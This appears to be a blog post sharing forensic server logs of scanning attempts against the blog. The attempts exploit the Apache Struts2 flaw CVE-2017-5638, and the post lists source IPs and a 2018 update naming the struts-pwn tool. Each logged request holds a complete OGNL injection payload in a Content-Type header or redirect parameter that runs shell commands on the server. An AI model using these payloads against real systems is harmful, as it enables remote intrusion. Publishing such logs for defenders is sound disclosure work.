blog.cyberwar.nl-forensic.log:+10800:59856d66:8e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+9129:59a7931c:79|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+15241:59a9759d:61|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+7914:59ba06d2:e9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Aman4Wolves').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|Host:blog.cyberwar.nl

The requests were received from the following IPs:

AS      | IP               | AS Name
2875    | 159.93.36.250    | JINR-AS JINR/HEPNET, RU
4134    | 122.225.98.178   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 182.148.123.59   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 218.94.37.42     | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 220.191.231.222  | CHINANET-BACKBONE No.31,Jin-rong Street, CN
9381    | 223.255.145.158  | WTT-AS-AP WTT HK Limited, HK
18978   | 23.244.78.26     | ENZUINC-US - Enzu Inc, US
37963   | 114.215.47.133   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.27.240.44    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.76.41.162    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.77.179.38    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.41.72.189    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.42.147.64    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 123.57.148.247   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
59019   | 120.92.84.17     | BJKSCNET Beijing Kingsoft Cloud Internet Technology Co., Ltd, CN
134764  | 116.31.125.127   | CT-FOSHAN-IDC CHINANET Guangdong province network, CN

UPDATE 2018-02-10: more log entries in Feb 2018, first one listing struts-pwn, a tool to test systems for CVE-2017-5638 (and perform remote command execution), released 11 months ago):

blog.cyberwar.nl-forensic.log:+31342:5a36c21f:65|GET / HTTP/1.1|Host:149.210.129.7|Connection:keep-alive|Accept-Encoding:gzip, deflate|Accept:*/*|User-Agent:struts-pwn (https%3a//github.com/mazen160/struts-pwn)|Content-Type:%25{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('tokjuoq','tokjuoq')}.multipart/form-data
blog.cyberwar.nl-forensic.log:+536:5a7ee6a9:7d|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/ HTTP/1.1|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#matt= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ("c9fd5ad9-e018-4118-9b93-6ed84ee84121"),#matt.getWriter().flush(),#matt.getWriter().close())}|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive
blog.cyberwar.nl-forensic.log:+28292:5a7ee6a9:162|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D HTTP/1.1|User-Agent:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0|referer:https%3a//blog.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive

EOF